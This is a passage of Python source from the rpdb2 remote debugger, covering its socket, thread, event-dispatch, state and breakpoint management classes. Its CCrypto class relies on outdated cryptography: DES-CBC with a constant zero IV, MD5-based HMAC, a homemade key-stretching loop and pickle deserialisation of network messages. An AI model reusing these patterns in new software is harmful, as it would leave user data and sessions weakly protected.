e = sys.exc_info()[1]
self.m_last_server_error = e
finally:
if conn != None:
conn.close()
s.close()
def __recv(self, s, len):
t0 = time.time()
while True:
try:
data = s.recv(1024)
return data
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EWOULDBLOCK:
print_debug('socket error was caught, %s' % repr(e))
raise
if time.time() - t0 > self.m_timeout:
raise
continue
def __GetSocketError(self, e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
#
# ---------------------------------- CThread ---------------------------------------
#
class CThread (threading.Thread):
m_fstop = False
m_threads = {}
m_lock = threading.RLock()
m_id = 0
def __init__(self, name = None, target = None, args = (), shutdown = None):
threading.Thread.__init__(self, name = name, target = target, args = args)
self.m_fstarted = False
self.m_shutdown_callback = shutdown
self.m_id = self.__getId()
def __del__(self):
#print_debug('Destructor called for ' + thread_get_name(self))
#threading.Thread.__del__(self)
if self.m_fstarted:
try:
del CThread.m_threads[self.m_id]
except KeyError:
pass
def start(self):
if CThread.m_fstop:
return
CThread.m_threads[self.m_id] = weakref.ref(self)
if CThread.m_fstop:
del CThread.m_threads[self.m_id]
return
self.m_fstarted = True
threading.Thread.start(self)
def run(self):
sys.settrace(None)
sys.setprofile(None)
threading.Thread.run(self)
def join(self, timeout = None):
try:
threading.Thread.join(self, timeout)
except AssertionError:
pass
def shutdown(self):
if self.m_shutdown_callback:
self.m_shutdown_callback()
def joinAll(cls):
print_debug('Shutting down debugger threads...')
CThread.m_fstop = True
for tid, w in list(CThread.m_threads.items()):
t = w()
if not t:
continue
try:
#print_debug('Calling shutdown of thread %s.' % thread_get_name(t))
t.shutdown()
except:
pass
t = None
t0 = time.time()
while len(CThread.m_threads) > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
print_debug('Shut down of debugger threads has TIMED OUT!')
return
#print_debug(repr(CThread.m_threads))
time.sleep(0.1)
print_debug('Shut down debugger threads, done.')
joinAll = classmethod(joinAll)
def clearJoin(cls):
CThread.m_fstop = False
clearJoin = classmethod(clearJoin)
def __getId(self):
CThread.m_lock.acquire()
id = CThread.m_id
CThread.m_id += 1
CThread.m_lock.release()
return id
#
#--------------------------------------- Crypto ---------------------------------------
#
class CCrypto:
"""
Handle authentication and encryption of data, using password protection.
"""
m_keys = {}
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_rpdb2_pwd = _rpdb2_pwd
self.m_key = self.__calc_key(_rpdb2_pwd)
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_rid = rid
self.m_failure_lock = threading.RLock()
self.m_lock = threading.RLock()
self.m_index_anchor_in = random.randint(0, 1000000000)
self.m_index_anchor_ex = 0
self.m_index = 0
self.m_index_table = {}
self.m_index_table_size = INDEX_TABLE_SIZE
self.m_max_index = 0
def __calc_key(self, _rpdb2_pwd):
"""
Create and return a key from a password.
A Weak password means a weak key.
"""
if _rpdb2_pwd in CCrypto.m_keys:
return CCrypto.m_keys[_rpdb2_pwd]
key = as_bytes(_rpdb2_pwd)
suffix = key[:16]
d = hmac.new(key, digestmod = _md5)
#
# The following loop takes around a second to complete
# and should strengthen the password by ~12 bits.
# a good password is ~30 bits strong so we are looking
# at ~42 bits strong key
#
for i in range(2 ** 12):
d.update((key + suffix) * 16)
key = d.digest()
CCrypto.m_keys[_rpdb2_pwd] = key
return key
def set_index(self, i, anchor):
try:
self.m_lock.acquire()
self.m_index = i
self.m_index_anchor_ex = anchor
finally:
self.m_lock.release()
def get_max_index(self):
return self.m_max_index
def do_crypto(self, args, fencrypt):
"""
Sign args and possibly encrypt.
Return signed/encrypted string.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
(digest, s) = self.__sign(args)
fcompress = False
if len(s) > 50000:
_s = zlib.compress(s)
if len(_s) < len(s) * 0.4:
s = _s
fcompress = True
if fencrypt:
s = self.__encrypt(s)
s = base64.encodestring(s)
u = as_unicode(s)
return (fcompress, digest, u)
def undo_crypto(self, fencrypt, fcompress, digest, msg, fVerifyIndex = True):
"""
Take crypto string, verify its signature and decrypt it, if
needed.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
s = as_bytes(msg)
s = base64.decodestring(s)
if fencrypt:
s = self.__decrypt(s)
if fcompress:
s = zlib.decompress(s)
args, id = self.__verify_signature(digest, s, fVerifyIndex)
return (args, id)
def __encrypt(self, s):
s_padded = s + as_bytes('\x00') * (DES.block_size - (len(s) % DES.block_size))
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
r = d.encrypt(s_padded)
return r
def __decrypt(self, s):
try:
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
_s = d.decrypt(s).strip(as_bytes('\x00'))
return _s
except:
self.__wait_a_little()
raise DecryptionFailure
def __sign(self, args):
i = self.__get_next_index()
pack = (self.m_index_anchor_ex, i, self.m_rid, args)
#print_debug('***** 1' + repr(args)[:50])
s = pickle.dumps(pack, 2)
#print_debug('***** 2' + repr(args)[:50])
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s\n\n==========\n\n%s' % (len(s), d, repr(args), repr(s)))
return (d, s)
def __get_next_index(self):
try:
self.m_lock.acquire()
self.m_index += 1
return self.m_index
finally:
self.m_lock.release()
def __verify_signature(self, digest, s, fVerifyIndex):
try:
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s, %s' % (len(s), digest, d, repr(s)))
if d != digest:
self.__wait_a_little()
raise AuthenticationFailure
pack = pickle.loads(s)
(anchor, i, id, args) = pack
except AuthenticationFailure:
raise
except:
print_debug_exception()
self.__wait_a_little()
raise AuthenticationBadData
if fVerifyIndex:
self.__verify_index(anchor, i, id)
return args, id
def __verify_index(self, anchor, i, id):
"""
Manage messages ids to prevent replay of old messages.
"""
try:
try:
self.m_lock.acquire()
if anchor != self.m_index_anchor_in:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
if i > self.m_max_index + INDEX_TABLE_SIZE // 2:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
i_mod = i % INDEX_TABLE_SIZE
(iv, idl) = self.m_index_table.get(i_mod, (None, None))
#print >> sys.__stderr__, i, i_mod, iv, self.m_max_index
if (iv is None) or (i > iv):
idl = [id]
elif (iv == i) and (not id in idl):
idl.append(id)
else:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
self.m_index_table[i_mod] = (i, idl)
if i > self.m_max_index:
self.m_max_index = i
return self.m_index
finally:
self.m_lock.release()
except:
self.__wait_a_little()
raise
def __wait_a_little(self):
self.m_failure_lock.acquire()
time.sleep((1.0 + random.random()) / 2)
self.m_failure_lock.release()
#
# --------------------------------- Events List --------------------------
#
class CEvent(object):
"""
Base class for events.
"""
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def is_match(self, arg):
pass
class CEventNull(CEvent):
"""
Sent to release event listeners (Internal, speeds up shutdown).
"""
pass
class CEventEmbeddedSync(CEvent):
"""
Sent when an embedded interpreter becomes active if it needs to
determine if there are pending break requests. (Internal)
"""
pass
class CEventClearSourceCache(CEvent):
"""
Sent when the source cache is cleared.
"""
pass
class CEventSignalIntercepted(CEvent):
"""
This event is sent when a signal is intercepted inside tracing code.
Such signals are held pending until tracing code is returned from.
"""
def __init__(self, signum):
self.m_signum = signum
self.m_signame = calc_signame(signum)
class CEventSignalException(CEvent):
"""
This event is sent when the handler of a previously intercepted signal
raises an exception. Such exceptions are ignored because of technical
limitations.
"""
def __init__(self, signum, description):
self.m_signum = signum
self.m_signame = calc_signame(signum)
self.m_description = description
class CEventEncoding(CEvent):
"""
The encoding has been set.
"""
def __init__(self, encoding, fraw):
self.m_encoding = encoding
self.m_fraw = fraw
class CEventPsycoWarning(CEvent):
"""
The psyco module was detected. rpdb2 is incompatible with this module.
"""
pass
class CEventConflictingModules(CEvent):
"""
Conflicting modules were detected. rpdb2 is incompatible with these modules.
"""
def __init__(self, modules_list):
self.m_modules_list = modules_list
class CEventSyncReceivers(CEvent):
"""
A base class for events that need to be received by all listeners at
the same time. The synchronization mechanism is internal to rpdb2.
"""
def __init__(self, sync_n):
self.m_sync_n = sync_n
class CEventForkSwitch(CEventSyncReceivers):
"""
Debuggee is about to fork. Try to reconnect.
"""
pass
class CEventExecSwitch(CEventSyncReceivers):
"""
Debuggee is about to exec. Try to reconnect.
"""
pass
class CEventExit(CEvent):
"""
Debuggee is terminating.
"""
pass
class CEventState(CEvent):
"""
State of the debugger.
Value of m_state can be one of the STATE_* globals.
"""
def __init__(self, state):
self.m_state = as_unicode(state)
def is_match(self, arg):
return self.m_state == as_unicode(arg)
class CEventSynchronicity(CEvent):
"""
Mode of synchronicity.
Sent when mode changes.
"""
def __init__(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
def is_match(self, arg):
return self.m_fsynchronicity == arg
class CEventTrap(CEvent):
"""
Mode of "trap unhandled exceptions".
Sent when the mode changes.
"""
def __init__(self, ftrap):
self.m_ftrap = ftrap
def is_match(self, arg):
return self.m_ftrap == arg
class CEventForkMode(CEvent):
"""
Mode of fork behavior has changed.
Sent when the mode changes.
"""
def __init__(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
class CEventUnhandledException(CEvent):
"""
Unhandled Exception
Sent when an unhandled exception is caught.
"""
class CEventNamespace(CEvent):
"""
Namespace has changed.
This tells the debugger it should query the namespace again.
"""
pass
class CEventNoThreads(CEvent):
"""
No threads to debug.
Debuggee notifies the debugger that it has no threads. This can
happen in embedded debugging and in a python interpreter session.
"""
pass
class CEventThreads(CEvent):
"""
State of threads.
"""
def __init__(self, _current_thread, thread_list):
self.m_current_thread = _current_thread
self.m_thread_list = thread_list
class CEventThreadBroken(CEvent):
"""
A thread has broken.
"""
def __init__(self, tid, name):
self.m_tid = tid
self.m_name = as_unicode(name)
class CEventStack(CEvent):
"""
Stack of current thread.
"""
def __init__(self, stack):
self.m_stack = stack
class CEventStackFrameChange(CEvent):
"""
Stack frame has changed.
This event is sent when the debugger goes up or down the stack.
"""
def __init__(self, frame_index):
self.m_frame_index = frame_index
class CEventStackDepth(CEvent):
"""
Stack depth has changed.
"""
def __init__(self, stack_depth, stack_depth_exception):
self.m_stack_depth = stack_depth
self.m_stack_depth_exception = stack_depth_exception
class CEventBreakpoint(CEvent):
"""
A breakpoint or breakpoints changed.
"""
DISABLE = as_unicode('disable')
ENABLE = as_unicode('enable')
REMOVE = as_unicode('remove')
SET = as_unicode('set')
def __init__(self, bp, action = SET, id_list = [], fAll = False):
self.m_bp = breakpoint_copy(bp)
self.m_action = action
self.m_id_list = id_list
self.m_fAll = fAll
class CEventSync(CEvent):
"""
Internal (not sent to the debugger) event that trigers the
firing of other events that help the debugger synchronize with
the state of the debuggee.
"""
def __init__(self, fException, fSendUnhandled):
self.m_fException = fException
self.m_fSendUnhandled = fSendUnhandled
#
# --------------------------------- Event Manager --------------------------
#
class CEventDispatcherRecord:
"""
Internal structure that binds a callback to particular events.
"""
def __init__(self, callback, event_type_dict, fSingleUse):
self.m_callback = callback
self.m_event_type_dict = copy.copy(event_type_dict)
self.m_fSingleUse = fSingleUse
def is_match(self, event):
rtl = [t for t in self.m_event_type_dict.keys() if isinstance(event, t)]
if len(rtl) == 0:
return False
#
# Examine first match only.
#
rt = rtl[0]
rte = self.m_event_type_dict[rt].get(EVENT_EXCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return False
return True
rte = self.m_event_type_dict[rt].get(EVENT_INCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return True
return False
return True
class CEventDispatcher:
"""
Events dispatcher.
Dispatchers can be chained together.
"""
def __init__(self, chained_event_dispatcher = None):
self.m_chained_event_dispatcher = chained_event_dispatcher
self.m_chain_override_types = {}
self.m_registrants = {}
def shutdown(self):
for er in list(self.m_registrants.keys()):
self.__remove_dispatcher_record(er)
def register_callback(self, callback, event_type_dict, fSingleUse):
er = CEventDispatcherRecord(callback, event_type_dict, fSingleUse)
#
# If we have a chained dispatcher, register the callback on the
# chained dispatcher as well.
#
if self.m_chained_event_dispatcher is not None:
_er = self.__register_callback_on_chain(er, event_type_dict, fSingleUse)
self.m_registrants[er] = _er
return er
self.m_registrants[er] = True
return er
def remove_callback(self, callback):
erl = [er for er in list(self.m_registrants.keys()) if er.m_callback == callback]
for er in erl:
self.__remove_dispatcher_record(er)
def fire_events(self, event_list):
for event in event_list:
self.fire_event(event)
def fire_event(self, event):
for er in list(self.m_registrants.keys()):
self.__fire_er(event, er)
def __fire_er(self, event, er):
if not er.is_match(event):
return
try:
er.m_callback(event)
except:
pass
if not er.m_fSingleUse:
return
try:
del self.m_registrants[er]
except KeyError:
pass
def register_chain_override(self, event_type_dict):
"""
Chain override prevents registration on chained
dispatchers for specific event types.
"""
for t in list(event_type_dict.keys()):
self.m_chain_override_types[t] = True
def __register_callback_on_chain(self, er, event_type_dict, fSingleUse):
_event_type_dict = copy.copy(event_type_dict)
for t in self.m_chain_override_types:
if t in _event_type_dict:
del _event_type_dict[t]
if len(_event_type_dict) == 0:
return False
def callback(event, er = er):
self.__fire_er(event, er)
_er = self.m_chained_event_dispatcher.register_callback(callback, _event_type_dict, fSingleUse)
return _er
def __remove_dispatcher_record(self, er):
try:
if self.m_chained_event_dispatcher is not None:
_er = self.m_registrants[er]
if _er != False:
self.m_chained_event_dispatcher.__remove_dispatcher_record(_er)
del self.m_registrants[er]
except KeyError:
pass
class CEventQueue:
"""
Add queue semantics above an event dispatcher.
Instead of firing event callbacks, new events are returned in a list
upon request.
"""
def __init__(self, event_dispatcher, max_event_list_length = MAX_EVENT_LIST_LENGTH):
self.m_event_dispatcher = event_dispatcher
self.m_event_lock = threading.Condition()
self.m_max_event_list_length = max_event_list_length
self.m_event_list = []
self.m_event_index = 0
self.m_n_waiters = []
def shutdown(self):
self.m_event_dispatcher.remove_callback(self.event_handler)
def register_event_types(self, event_type_dict):
self.m_event_dispatcher.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
def event_handler(self, event):
try:
self.m_event_lock.acquire()
if isinstance(event, CEventSyncReceivers):
t0 = time.time()
while len(self.m_n_waiters) < event.m_sync_n and time.time() < t0 + HEARTBEAT_TIMEOUT:
time.sleep(0.1)
self.m_event_list.append(event)
if len(self.m_event_list) > self.m_max_event_list_length:
self.m_event_list.pop(0)
self.m_event_index += 1
lock_notify_all(self.m_event_lock)
finally:
self.m_event_lock.release()
def get_event_index(self):
return self.m_event_index
def wait_for_event(self, timeout, event_index):
"""
Return the new events which were fired.
"""
try:
self.m_n_waiters.append(0)
self.m_event_lock.acquire()
if event_index >= self.m_event_index:
safe_wait(self.m_event_lock, timeout)
if event_index >= self.m_event_index:
return (self.m_event_index, [])
sub_event_list = self.m_event_list[event_index - self.m_event_index:]
return (self.m_event_index, sub_event_list)
finally:
self.m_n_waiters.pop()
self.m_event_lock.release()
class CStateManager:
"""
Manage possible debugger states (broken, running, etc...)
The state manager can receive state changes via an input event
dispatcher or via the set_state() method
It sends state changes forward to the output event dispatcher.
The state can also be queried or waited for.
"""
def __init__(self, initial_state, event_dispatcher_output = None, event_dispatcher_input = None):
self.m_event_dispatcher_input = event_dispatcher_input
self.m_event_dispatcher_output = event_dispatcher_output
if self.m_event_dispatcher_input is not None:
event_type_dict = {CEventState: {}}
self.m_event_dispatcher_input.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
if self.m_event_dispatcher_output is not None:
self.m_event_dispatcher_output.register_chain_override(event_type_dict)
self.m_state_lock = threading.Condition()
self.m_state_queue = []
self.m_state_index = 0
self.m_waiter_list = {}
self.set_state(initial_state)
def shutdown(self):
if self.m_event_dispatcher_input is not None:
self.m_event_dispatcher_input.remove_callback(self.event_handler)
def event_handler(self, event):
self.set_state(event.m_state)
def get_state(self):
return self.m_state_queue[-1]
def __add_state(self, state):
self.m_state_queue.append(state)
self.m_state_index += 1
self.__remove_states()
def __remove_states(self, treshold = None):
"""
Clean up old state changes from the state queue.
"""
index = self.__calc_min_index()
if (treshold is not None) and (index <= treshold):
return
_delta = 1 + self.m_state_index - index
self.m_state_queue = self.m_state_queue[-_delta:]
def __calc_min_index(self):
"""
Calc the minimum state index.
The calculated index is the oldest state of which all state
waiters are aware of. That is, no one cares for older states
and these can be removed from the state queue.
"""
if len(self.m_waiter_list) == 0:
return self.m_state_index
index_list = list(self.m_waiter_list.keys())
min_index = min(index_list)
return min_index
def __add_waiter(self):
index = self.m_state_index
n = self.m_waiter_list.get(index, 0)
self.m_waiter_list[index] = n + 1
return index
def __remove_waiter(self, index):
n = self.m_waiter_list[index]
if n == 1:
del self.m_waiter_list[index]
self.__remove_states(index)
else:
self.m_waiter_list[index] = n - 1
def __get_states(self, index):
_delta = 1 + self.m_state_index - index
states = self.m_state_queue[-_delta:]
return states
def set_state(self, state = None, fLock = True):
try:
if fLock:
self.m_state_lock.acquire()
if state is None:
state = self.get_state()
self.__add_state(state)
lock_notify_all(self.m_state_lock)
finally:
if fLock:
self.m_state_lock.release()
if self.m_event_dispatcher_output is not None:
event = CEventState(state)
self.m_event_dispatcher_output.fire_event(event)
def wait_for_state(self, state_list):
"""
Wait for any of the states in the state list.
"""
try:
self.m_state_lock.acquire()
if self.get_state() in state_list:
return self.get_state()
while True:
index = self.__add_waiter()
alertable_wait(self.m_state_lock, PING_TIMEOUT)
states = self.__get_states(index)
self.__remove_waiter(index)
for state in states:
if state in state_list:
return state
finally:
self.m_state_lock.release()
def acquire(self):
self.m_state_lock.acquire()
def release(self):
self.m_state_lock.release()
#
# -------------------------------------- Break Info manager ---------------------------------------
#
def myord(c):
try:
return ord(c)
except:
return c
def CalcValidLines(code):
l = code.co_firstlineno
vl = [l]
bl = [myord(c) for c in code.co_lnotab[2::2]]
sl = [myord(c) for c in code.co_lnotab[1::2]]
for (bi, si) in zip(bl, sl):
l += si
if bi == 0:
continue
if l != vl[-1]:
vl.append(l)
if len(sl) > 0:
l += sl[-1]
if l != vl[-1]:
vl.append(l)
return vl
class CScopeBreakInfo:
def __init__(self, fqn, valid_lines):
self.m_fqn = fqn
self.m_first_line = valid_lines[0]
self.m_last_line = valid_lines[-1]
self.m_valid_lines = valid_lines
def CalcScopeLine(self, lineno):
rvl = copy.copy(self.m_valid_lines)
rvl.reverse()
for l in rvl:
if lineno >= l:
break
return l
def __str__(self):
return "('" + self.m_fqn + "', " + str(self.m_valid_lines) + ')'
class CFileBreakInfo:
"""
Break info structure for a source file.
"""
def __init__(self, filename):
self.m_filename = filename
self.m_first_line = 0
self.m_last_line = 0
self.m_scope_break_info = []
def CalcBreakInfo(self):
(source, encoding) = get_source(self.m_filename)
_source = as_string(source + as_unicode('\n'), encoding)
code = compile(_source, self.m_filename, "exec")
self.m_scope_break_info = []
self.m_first_line = code.co_firstlineno
self.m_last_line = 0
fqn = []
t = [code]
while len(t) > 0:
c = t.pop(0)
if type(c) == tuple:
self.m_scope_break_info.append(CScopeBreakInfo(*c))
fqn.pop()
continue
fqn = fqn + [c.co_name]
valid_lines = CalcValidLines(c)
self.m_last_line = max(self.m_last_line, valid_lines[-1])
_fqn = as_unicode('.'.join(fqn), encoding)
si = (_fqn, valid_lines)
subcodeslist = self.__CalcSubCodesList(c)
t = subcodeslist + [si] + t
def __CalcSubCodesList(self, code):
tc = type(code)
t = [(c.co_firstlineno, c) for c in code.co_consts if type(c) == tc]
t.sort()
scl = [c[1] for c in t]
return scl
def FindScopeByLineno(self, lineno):
lineno = max(min(lineno, self.m_last_line), self.m_first_line)
smaller_element = None
exact_element = None
for sbi in self.m_scope_break_info:
if lineno > sbi.m_last_line:
if (smaller_element is None) or (sbi.m_last_line >= smaller_element.m_last_line):
smaller_element = sbi
continue
if (lineno >= sbi.m_first_line) and (lineno <= sbi.m_last_line):
exact_element = sbi
break
assert(exact_element is not None)
scope = exact_element
l = exact_element.CalcScopeLine(lineno)
if (smaller_element is not None) and (l <= smaller_element.m_last_line):
scope = smaller_element
l = smaller_element.CalcScopeLine(lineno)
return (scope, l)
def FindScopeByName(self, name, offset):
if name.startswith(MODULE_SCOPE):
alt_scope = MODULE_SCOPE2 + name[len(MODULE_SCOPE):]
elif name.startswith(MODULE_SCOPE2):
alt_scope = MODULE_SCOPE + name[len(MODULE_SCOPE2):]
else:
return self.FindScopeByName(MODULE_SCOPE2 + SCOPE_SEP + name, offset)
for sbi in self.m_scope_break_info:
if sbi.m_fqn in [name, alt_scope]:
l = sbi.CalcScopeLine(sbi.m_first_line + offset)
return (sbi, l)
print_debug('Invalid scope: %s' % repr(name))
raise InvalidScopeName
class CBreakInfoManager:
"""
Manage break info dictionary per filename.
"""
def __init__(self):
self.m_file_info_dic = {}
def addFile(self, filename):
mbi = CFileBreakInfo(filename)
mbi.CalcBreakInfo()
self.m_file_info_dic[filename] = mbi
def getFile(self, filename):
if not filename in self.m_file_info_dic:
self.addFile(filename)
return self.m_file_info_dic[filename]
#
# -------------------------------- Break Point Manager -----------------------------
#
def breakpoint_copy(bp):
if bp is None:
return None
_bp = copy.copy(bp)
#filename = g_found_unicode_files.get(bp.m_filename, bp.m_filename)
_bp.m_filename = as_unicode(bp.m_filename, sys.getfilesystemencoding())
_bp.m_code = None
return _bp
class CBreakPoint(object):
def __init__(self, filename, scope_fqn, scope_first_line, lineno, fEnabled, expr, encoding, fTemporary = False):
"""
Breakpoint constructor.
scope_fqn - scope fully qualified name. e.g: module.class.method
"""
self.m_id = None
self.m_fEnabled = fEnabled
self.m_filename = filename
self.m_scope_fqn = scope_fqn
self.m_scope_name = scope_fqn.split(SCOPE_SEP)[-1]
self.m_scope_first_line = scope_first_line
self.m_scope_offset = lineno - scope_first_line
self.m_lineno = lineno
self.m_expr = expr
self.m_encoding = encoding
self.m_code = None
self.m_fTemporary = fTemporary
if (expr is not None) and (expr != ''):
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
print_debug('Breakpoint expression: %s' % repr(_expr))
self.m_code = compile(_expr, '<string>', 'eval')
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def calc_enclosing_scope_name(self):
if self.m_scope_offset != 0:
return None
if self.m_scope_fqn in [MODULE_SCOPE, MODULE_SCOPE2]:
return None
scope_name_list = self.m_scope_fqn.split(SCOPE_SEP)
enclosing_scope_name = scope_name_list[-2]
return enclosing_scope_name
def enable(self):
self.m_fEnabled = True
def disable(self):
self.m_fEnabled = False
def isEnabled(self):
return self.m_fEnabled
def __str__(self):
return "('" + self.m_filename + "', '" + self.m_scope_fqn + "', " + str(self.m_scope_first_line) + ', ' + str(self.m_scope_offset) + ', ' + str(self.m_lineno) + ')'
class CBreakPointsManagerProxy:
"""
A proxy for the breakpoint manager.
While the breakpoint manager resides on the debuggee (the server),
the proxy resides in the debugger (the client - session manager)
"""
def __init__(self, session_manager):
self.m_session_manager = session_manager
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
#
# The breakpoint proxy inserts itself between the two chained
# event dispatchers in the session manager.
#
event_type_dict = {CEventBreakpoint: {}}
self.m_session_manager.m_event_dispatcher_proxy.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
self.m_session_manager.m_event_dispatcher.register_chain_override(event_type_dict)
def update_bp(self, event):
"""
Handle breakpoint updates that arrive via the event dispatcher.
"""
try:
self.m_lock.acquire()
if event.m_fAll:
id_list = list(self.m_break_points_by_id.keys())
else:
id_list = event.m_id_list
if event.m_action == CEventBreakpoint.REMOVE:
for id in id_list:
try:
bp = self.m_break_points_by_id.pop(id)
bpm = self.m_break_points_by_file[bp.m_filename]
del bpm[bp.m_lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[bp.m_filename]
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.DISABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.disable()
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.ENABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.enable()
except KeyError:
pass
return
bpm = self.m_break_points_by_file.get(event.m_bp.m_filename, {})
bpm[event.m_bp.m_lineno] = event.m_bp
self.m_break_points_by_id[event.m_bp.m_id] = event.m_bp
finally:
self.m_lock.release()
self.m_session_manager.m_event_dispatcher.fire_event(event)
def sync(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
break_points_by_id = self.m_session_manager.getSession().getProxy().get_breakpoints()
try:
self.m_lock.acquire()
self.m_break_points_by_id.update(break_points_by_id)
for bp in list(self.m_break_points_by_id.values()):
bpm = self.m_break_points_by_file.get(bp.m_filename, {})
bpm[bp.m_lineno] = bp
finally:
self.m_lock.release()
def clear(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
def get_breakpoint(self, filename, lineno):
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
class CBreakPointsManager:
def __init__(self):
self.m_break_info_manager = CBreakInfoManager()
self.m_active_break_points_by_file = {}
self.m_break_points_by_function = {}
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
self.m_temp_bp = None
self.m_fhard_tbp = False
def get_active_break_points_by_file(self, filename):
"""
Get active breakpoints for file.
"""
_filename = winlower(filename)
return self.m_active_break_points_by_file.setdefault(_filename, {})
def __calc_active_break_points_by_file(self, filename):
bpmpt = self.m_active_break_points_by_file.setdefault(filename, {})
bpmpt.clear()
bpm = self.m_break_points_by_file.get(filename, {})
for bp in list(bpm.values()):
if bp.m_fEnabled:
bpmpt[bp.m_lineno] = bp
tbp = self.m_temp_bp
if (tbp is not None) and (tbp.m_filename == filename):
bpmpt[tbp.m_lineno] = tbp
def __remove_from_function_list(self, bp):
function_name = bp.m_scope_name
try:
bpf = self.m_break_points_by_function[function_name]
del bpf[bp]
if len(bpf) == 0:
del self.m_break_points_by_function[function_name]
except KeyError:
pass
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
try:
_bpf = self.m_break_points_by_function[_function_name]
del _bpf[bp]
if len(_bpf) == 0:
del self.m_break_points_by_function[_function_name]
except KeyError:
pass
def __add_to_function_list(self, bp):
function_name = bp.m_scope_name
bpf = self.m_break_points_by_function.setdefault(function_name, {})
bpf[bp] = True
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
_bpf = self.m_break_points_by_function.setdefault(_function_name, {})
_bpf[bp] = True
def get_breakpoint(self, filename, lineno):
"""
Get breakpoint by file and line number.
"""
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
def del_temp_breakpoint(self, fLock = True, breakpoint = None):
"""
Delete a temoporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
if self.m_temp_bp is None:
return
try:
if fLock:
self.m_lock.acquire()
if self.m_temp_bp is None:
return
if self.m_fhard_tbp and not breakpoint is self.m_temp_bp:
return
bp = self.m_temp_bp
self.m_temp_bp = None
self.m_fhard_tbp = False
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
if fLock:
self.m_lock.release()
def set_temp_breakpoint(self, filename, scope, lineno, fhard = False):
"""
Set a temoporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled = True, expr = as_unicode(''), encoding = as_unicode('utf-8'), fTemporary = True)
try:
self.m_lock.acquire()
self.m_fhard_tbp = False
self.del_temp_breakpoint(fLock = False)
self.m_fhard_tbp = fhard
self.m_temp_bp = bp
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding):
"""
Set breakpoint.
scope - a string (possibly empty) with the dotted scope of the
breakpoint. eg. 'my_module.my_class.foo'
expr - a string (possibly empty) with a python expression
that will be evaluated at the scope of the breakpoint.
The breakpoint will be hit if the expression evaluates
to True.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled, expr, encoding)
try:
self.m_lock.acquire()
bpm = self.m_break_points_by_file.setdefault(_filename, {})
#
# If a breakpoint on the same line is found we use its ID.
# Since the debugger lists breakpoints by IDs, this has
# a similar effect to modifying the breakpoint.
#
try:
old_bp = bpm[l]
